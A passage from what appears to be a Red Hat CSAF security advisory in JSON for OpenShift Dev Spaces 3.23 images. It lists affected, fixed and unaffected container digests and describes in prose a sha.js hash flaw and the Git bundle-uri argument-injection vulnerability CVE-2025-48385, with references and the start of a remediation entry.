            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "sha.js: Missing type checks leading to hash rewind and passing on crafted data"
    },
    {
      "cve": "CVE-2025-48385",
      "cwe": {
        "id": "CWE-88",
        "name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
      },
      "discovery_date": "2025-07-08T19:00:55.106787+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2378808"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A bundled uri handling flaw was found in Git. When cloning a repository, Git knows to optionally fetch a bundle advertised by the remote server, which allows the server side to offload parts of the clone to a CDN. The Git client does not perform sufficient validation of the advertised bundles, which allows the remote side to perform protocol injection.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "git: Git arbitrary file writes",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This vulnerability marked as Important rather than a Moderate flaw because it enables protocol injection at the transport layer of Git\u0027s bundle-uri mechanism, allowing a remote server to manipulate how and where data is written on the client system during a clone operation. The lack of input sanitization on user-controlled values like the URI and target path means that malformed inputs containing spaces or newlines can break protocol framing, leading to arbitrary file writes. In scenarios such as CI pipelines, developer environments, or recursive clones with submodules, an attacker can exploit this to overwrite critical files or inject malicious content, potentially achieving remote code execution (RCE).",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-48385"
        },
        {
          "category": "external",
          "summary": "RHBZ#2378808",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2378808"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-48385",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-48385"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-48385",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48385"
        },
        {
          "category": "external",
          "summary": "https://github.com/git/git/security/advisories/GHSA-m98c-vgpc-9655",
          "url": "https://github.com/git/git/security/advisories/GHSA-m98c-vgpc-9655"
        }
      ],
      "release_date": "2025-07-08T18:23:44.405000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
